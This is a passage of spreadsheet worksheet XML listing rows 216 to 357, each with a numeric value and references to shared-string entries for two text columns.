        <v>40.0</v>
      </c>
      <c r="B216" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C216" s="125" t="s">
        <v>1515</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="106">
        <v>65.0</v>
      </c>
      <c r="B217" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C217" s="126" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="101">
        <v>238.0</v>
      </c>
      <c r="B218" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C218" s="125" t="s">
        <v>1524</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="106">
        <v>241.0</v>
      </c>
      <c r="B219" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C219" s="126" t="s">
        <v>1527</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="101">
        <v>288.0</v>
      </c>
      <c r="B220" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C220" s="125" t="s">
        <v>1533</v>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="106">
        <v>290.0</v>
      </c>
      <c r="B221" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C221" s="126" t="s">
        <v>1536</v>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="101">
        <v>297.0</v>
      </c>
      <c r="B222" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C222" s="125" t="s">
        <v>1544</v>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="106">
        <v>315.0</v>
      </c>
      <c r="B223" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C223" s="126" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="101">
        <v>348.0</v>
      </c>
      <c r="B224" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C224" s="125" t="s">
        <v>1553</v>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="106">
        <v>388.0</v>
      </c>
      <c r="B225" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C225" s="126" t="s">
        <v>1556</v>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="101">
        <v>400.0</v>
      </c>
      <c r="B226" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C226" s="125" t="s">
        <v>1559</v>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="106">
        <v>410.0</v>
      </c>
      <c r="B227" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C227" s="126" t="s">
        <v>1562</v>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="101">
        <v>515.0</v>
      </c>
      <c r="B228" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C228" s="125" t="s">
        <v>1565</v>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="106">
        <v>641.0</v>
      </c>
      <c r="B229" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C229" s="126" t="s">
        <v>1568</v>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="101">
        <v>652.0</v>
      </c>
      <c r="B230" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C230" s="125" t="s">
        <v>1576</v>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="106">
        <v>725.0</v>
      </c>
      <c r="B231" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C231" s="126" t="s">
        <v>1579</v>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="101">
        <v>856.0</v>
      </c>
      <c r="B232" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C232" s="125" t="s">
        <v>1585</v>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="106">
        <v>880.0</v>
      </c>
      <c r="B233" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C233" s="126" t="s">
        <v>1588</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="101">
        <v>985.0</v>
      </c>
      <c r="B234" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C234" s="125" t="s">
        <v>1594</v>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="106">
        <v>1129.0</v>
      </c>
      <c r="B235" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C235" s="126" t="s">
        <v>1597</v>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="101">
        <v>1638.0</v>
      </c>
      <c r="B236" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C236" s="125" t="s">
        <v>1603</v>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="106">
        <v>1662.0</v>
      </c>
      <c r="B237" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C237" s="126" t="s">
        <v>1606</v>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="101">
        <v>1693.0</v>
      </c>
      <c r="B238" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C238" s="125" t="s">
        <v>1609</v>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="106">
        <v>1713.0</v>
      </c>
      <c r="B239" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C239" s="126" t="s">
        <v>1615</v>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="101">
        <v>1722.0</v>
      </c>
      <c r="B240" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C240" s="125" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="106">
        <v>1756.0</v>
      </c>
      <c r="B241" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C241" s="126" t="s">
        <v>1621</v>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="101">
        <v>1866.0</v>
      </c>
      <c r="B242" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C242" s="125" t="s">
        <v>1624</v>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="106">
        <v>1981.0</v>
      </c>
      <c r="B243" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C243" s="126" t="s">
        <v>1627</v>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="101">
        <v>2014.0</v>
      </c>
      <c r="B244" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C244" s="125" t="s">
        <v>1630</v>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="106">
        <v>2208.0</v>
      </c>
      <c r="B245" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C245" s="126" t="s">
        <v>1633</v>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="101">
        <v>2242.0</v>
      </c>
      <c r="B246" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C246" s="125" t="s">
        <v>1636</v>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="106">
        <v>2776.0</v>
      </c>
      <c r="B247" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C247" s="126" t="s">
        <v>1642</v>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="101">
        <v>4176.0</v>
      </c>
      <c r="B248" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C248" s="125" t="s">
        <v>1648</v>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="106">
        <v>4704.0</v>
      </c>
      <c r="B249" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C249" s="126" t="s">
        <v>1654</v>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="101">
        <v>6202.0</v>
      </c>
      <c r="B250" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C250" s="125" t="s">
        <v>1660</v>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="106">
        <v>7241.0</v>
      </c>
      <c r="B251" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C251" s="126" t="s">
        <v>1666</v>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="101">
        <v>7451.0</v>
      </c>
      <c r="B252" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C252" s="125" t="s">
        <v>1669</v>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="106">
        <v>7473.0</v>
      </c>
      <c r="B253" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C253" s="126" t="s">
        <v>1672</v>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="101">
        <v>7501.0</v>
      </c>
      <c r="B254" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C254" s="125" t="s">
        <v>1675</v>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="106">
        <v>7511.0</v>
      </c>
      <c r="B255" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C255" s="126" t="s">
        <v>1678</v>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="101">
        <v>7535.0</v>
      </c>
      <c r="B256" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C256" s="125" t="s">
        <v>1681</v>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="106">
        <v>7848.0</v>
      </c>
      <c r="B257" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C257" s="126" t="s">
        <v>1684</v>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="101">
        <v>9055.0</v>
      </c>
      <c r="B258" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C258" s="125" t="s">
        <v>1687</v>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="106">
        <v>10608.0</v>
      </c>
      <c r="B259" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C259" s="126" t="s">
        <v>1690</v>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="101">
        <v>183.0</v>
      </c>
      <c r="B260" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C260" s="125" t="s">
        <v>1693</v>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="106">
        <v>1731.0</v>
      </c>
      <c r="B261" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C261" s="126" t="s">
        <v>1699</v>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="101">
        <v>1811.0</v>
      </c>
      <c r="B262" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C262" s="125" t="s">
        <v>1706</v>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="106">
        <v>2532.0</v>
      </c>
      <c r="B263" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C263" s="126" t="s">
        <v>1709</v>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="101">
        <v>2776.0</v>
      </c>
      <c r="B264" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C264" s="125" t="s">
        <v>1712</v>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="106">
        <v>2777.0</v>
      </c>
      <c r="B265" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C265" s="126" t="s">
        <v>1715</v>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="101">
        <v>3174.0</v>
      </c>
      <c r="B266" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C266" s="125" t="s">
        <v>1721</v>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="106">
        <v>3376.0</v>
      </c>
      <c r="B267" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C267" s="126" t="s">
        <v>1727</v>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="101">
        <v>3382.0</v>
      </c>
      <c r="B268" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C268" s="125" t="s">
        <v>1730</v>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="106">
        <v>3584.0</v>
      </c>
      <c r="B269" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C269" s="126" t="s">
        <v>1739</v>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="101">
        <v>3604.0</v>
      </c>
      <c r="B270" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C270" s="125" t="s">
        <v>1742</v>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="106">
        <v>3630.0</v>
      </c>
      <c r="B271" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C271" s="126" t="s">
        <v>1745</v>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="101">
        <v>3946.0</v>
      </c>
      <c r="B272" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C272" s="125" t="s">
        <v>1751</v>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="106">
        <v>4548.0</v>
      </c>
      <c r="B273" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C273" s="126" t="s">
        <v>1757</v>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="101">
        <v>4611.0</v>
      </c>
      <c r="B274" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C274" s="125" t="s">
        <v>1760</v>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="106">
        <v>4621.0</v>
      </c>
      <c r="B275" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C275" s="126" t="s">
        <v>1763</v>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="101">
        <v>4943.0</v>
      </c>
      <c r="B276" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C276" s="125" t="s">
        <v>1772</v>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="106">
        <v>5469.0</v>
      </c>
      <c r="B277" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C277" s="126" t="s">
        <v>1791</v>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="101">
        <v>5990.0</v>
      </c>
      <c r="B278" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C278" s="125" t="s">
        <v>1803</v>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="106">
        <v>6007.0</v>
      </c>
      <c r="B279" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C279" s="126" t="s">
        <v>1806</v>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="101">
        <v>6403.0</v>
      </c>
      <c r="B280" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C280" s="125" t="s">
        <v>1812</v>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="106">
        <v>6484.0</v>
      </c>
      <c r="B281" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C281" s="126" t="s">
        <v>1821</v>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="101">
        <v>6610.0</v>
      </c>
      <c r="B282" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C282" s="125" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="106">
        <v>6723.0</v>
      </c>
      <c r="B283" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C283" s="126" t="s">
        <v>1830</v>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="101">
        <v>6859.0</v>
      </c>
      <c r="B284" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C284" s="125" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="106">
        <v>7101.0</v>
      </c>
      <c r="B285" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C285" s="126" t="s">
        <v>1836</v>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="101">
        <v>7106.0</v>
      </c>
      <c r="B286" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C286" s="125" t="s">
        <v>1839</v>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="106">
        <v>7212.0</v>
      </c>
      <c r="B287" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C287" s="126" t="s">
        <v>1842</v>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="101">
        <v>7308.0</v>
      </c>
      <c r="B288" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C288" s="125" t="s">
        <v>1845</v>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="106">
        <v>7314.0</v>
      </c>
      <c r="B289" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C289" s="126" t="s">
        <v>1848</v>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="101">
        <v>7490.0</v>
      </c>
      <c r="B290" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C290" s="125" t="s">
        <v>1851</v>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="106">
        <v>13824.0</v>
      </c>
      <c r="B291" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C291" s="126" t="s">
        <v>1927</v>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="101">
        <v>13831.0</v>
      </c>
      <c r="B292" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C292" s="125" t="s">
        <v>1930</v>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="106">
        <v>13986.0</v>
      </c>
      <c r="B293" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C293" s="126" t="s">
        <v>1933</v>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="101">
        <v>14208.0</v>
      </c>
      <c r="B294" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C294" s="125" t="s">
        <v>1936</v>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="106">
        <v>14291.0</v>
      </c>
      <c r="B295" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C295" s="126" t="s">
        <v>1939</v>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="101">
        <v>14498.0</v>
      </c>
      <c r="B296" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C296" s="125" t="s">
        <v>1945</v>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="106">
        <v>14647.0</v>
      </c>
      <c r="B297" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C297" s="126" t="s">
        <v>1948</v>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="101">
        <v>14674.0</v>
      </c>
      <c r="B298" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C298" s="125" t="s">
        <v>1951</v>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="106">
        <v>14676.0</v>
      </c>
      <c r="B299" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C299" s="126" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="101">
        <v>15430.0</v>
      </c>
      <c r="B300" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C300" s="125" t="s">
        <v>1963</v>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="106">
        <v>15476.0</v>
      </c>
      <c r="B301" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C301" s="126" t="s">
        <v>1966</v>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="101">
        <v>15485.0</v>
      </c>
      <c r="B302" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C302" s="125" t="s">
        <v>1969</v>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="106">
        <v>15720.0</v>
      </c>
      <c r="B303" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C303" s="126" t="s">
        <v>1972</v>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="101">
        <v>15765.0</v>
      </c>
      <c r="B304" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C304" s="125" t="s">
        <v>1975</v>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="106">
        <v>15828.0</v>
      </c>
      <c r="B305" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C305" s="126" t="s">
        <v>1978</v>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="101">
        <v>16150.0</v>
      </c>
      <c r="B306" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C306" s="125" t="s">
        <v>1984</v>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="106">
        <v>16856.0</v>
      </c>
      <c r="B307" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C307" s="126" t="s">
        <v>1990</v>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="101">
        <v>16857.0</v>
      </c>
      <c r="B308" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C308" s="125" t="s">
        <v>1993</v>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="106">
        <v>17204.0</v>
      </c>
      <c r="B309" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C309" s="126" t="s">
        <v>1999</v>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="101">
        <v>17341.0</v>
      </c>
      <c r="B310" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C310" s="125" t="s">
        <v>2002</v>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="106">
        <v>17524.0</v>
      </c>
      <c r="B311" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C311" s="126" t="s">
        <v>2008</v>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="101">
        <v>17542.0</v>
      </c>
      <c r="B312" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C312" s="125" t="s">
        <v>2011</v>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="106">
        <v>17585.0</v>
      </c>
      <c r="B313" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C313" s="126" t="s">
        <v>2014</v>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="101">
        <v>17763.0</v>
      </c>
      <c r="B314" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C314" s="125" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="106">
        <v>17778.0</v>
      </c>
      <c r="B315" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C315" s="126" t="s">
        <v>2024</v>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="101">
        <v>17869.0</v>
      </c>
      <c r="B316" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C316" s="125" t="s">
        <v>2027</v>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="106">
        <v>18041.0</v>
      </c>
      <c r="B317" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C317" s="126" t="s">
        <v>2030</v>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="101">
        <v>18092.0</v>
      </c>
      <c r="B318" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C318" s="125" t="s">
        <v>2033</v>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="106">
        <v>18424.0</v>
      </c>
      <c r="B319" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C319" s="126" t="s">
        <v>2036</v>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="101">
        <v>18597.0</v>
      </c>
      <c r="B320" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C320" s="125" t="s">
        <v>2039</v>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="106">
        <v>18751.0</v>
      </c>
      <c r="B321" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C321" s="126" t="s">
        <v>2045</v>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="101">
        <v>19159.0</v>
      </c>
      <c r="B322" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C322" s="125" t="s">
        <v>2051</v>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="106">
        <v>19280.0</v>
      </c>
      <c r="B323" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C323" s="126" t="s">
        <v>2057</v>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="101">
        <v>19368.0</v>
      </c>
      <c r="B324" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C324" s="125" t="s">
        <v>2060</v>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="106">
        <v>20013.0</v>
      </c>
      <c r="B325" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C325" s="126" t="s">
        <v>2063</v>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="101">
        <v>20375.0</v>
      </c>
      <c r="B326" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C326" s="125" t="s">
        <v>2066</v>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="106">
        <v>21754.0</v>
      </c>
      <c r="B327" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C327" s="126" t="s">
        <v>2078</v>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="101">
        <v>22071.0</v>
      </c>
      <c r="B328" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C328" s="125" t="s">
        <v>2081</v>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="106">
        <v>22986.0</v>
      </c>
      <c r="B329" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C329" s="126" t="s">
        <v>2091</v>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="101">
        <v>22989.0</v>
      </c>
      <c r="B330" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C330" s="125" t="s">
        <v>2094</v>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="106">
        <v>23712.0</v>
      </c>
      <c r="B331" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C331" s="126" t="s">
        <v>2100</v>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="101">
        <v>23981.0</v>
      </c>
      <c r="B332" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C332" s="125" t="s">
        <v>2103</v>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="106">
        <v>24152.0</v>
      </c>
      <c r="B333" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C333" s="126" t="s">
        <v>2106</v>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="101">
        <v>24632.0</v>
      </c>
      <c r="B334" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C334" s="125" t="s">
        <v>2109</v>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="106">
        <v>24886.0</v>
      </c>
      <c r="B335" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C335" s="126" t="s">
        <v>2112</v>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="101">
        <v>25026.0</v>
      </c>
      <c r="B336" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C336" s="125" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="106">
        <v>25881.0</v>
      </c>
      <c r="B337" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C337" s="126" t="s">
        <v>2127</v>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="101">
        <v>275.0</v>
      </c>
      <c r="B338" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C338" s="125" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="106">
        <v>655.0</v>
      </c>
      <c r="B339" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C339" s="126" t="s">
        <v>2147</v>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="101">
        <v>785.0</v>
      </c>
      <c r="B340" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C340" s="125" t="s">
        <v>2159</v>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="106">
        <v>1259.0</v>
      </c>
      <c r="B341" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C341" s="126" t="s">
        <v>2177</v>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="101">
        <v>1432.0</v>
      </c>
      <c r="B342" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C342" s="125" t="s">
        <v>2180</v>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="106">
        <v>1439.0</v>
      </c>
      <c r="B343" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C343" s="126" t="s">
        <v>2183</v>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="101">
        <v>1447.0</v>
      </c>
      <c r="B344" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C344" s="125" t="s">
        <v>2186</v>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="106">
        <v>1824.0</v>
      </c>
      <c r="B345" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C345" s="126" t="s">
        <v>2197</v>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="101">
        <v>1842.0</v>
      </c>
      <c r="B346" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C346" s="125" t="s">
        <v>2203</v>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="106">
        <v>1979.0</v>
      </c>
      <c r="B347" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C347" s="126" t="s">
        <v>2209</v>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="101">
        <v>2235.0</v>
      </c>
      <c r="B348" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C348" s="125" t="s">
        <v>2215</v>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="106">
        <v>2504.0</v>
      </c>
      <c r="B349" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C349" s="126" t="s">
        <v>2218</v>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="101">
        <v>2718.0</v>
      </c>
      <c r="B350" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C350" s="125" t="s">
        <v>2221</v>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="106">
        <v>2856.0</v>
      </c>
      <c r="B351" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C351" s="126" t="s">
        <v>2224</v>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="101">
        <v>2858.0</v>
      </c>
      <c r="B352" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C352" s="125" t="s">
        <v>2227</v>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="106">
        <v>3394.0</v>
      </c>
      <c r="B353" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C353" s="126" t="s">
        <v>2245</v>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="101">
        <v>3711.0</v>
      </c>
      <c r="B354" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C354" s="125" t="s">
        <v>2251</v>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="106">
        <v>4469.0</v>
      </c>
      <c r="B355" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C355" s="126" t="s">
        <v>2260</v>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="101">
        <v>4893.0</v>
      </c>
      <c r="B356" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C356" s="125" t="s">
        <v>2263</v>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="106">
        <v>116.0</v>
      </c>
      <c r="B357" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C357" s="126" t="s">
        <v>2269</v>
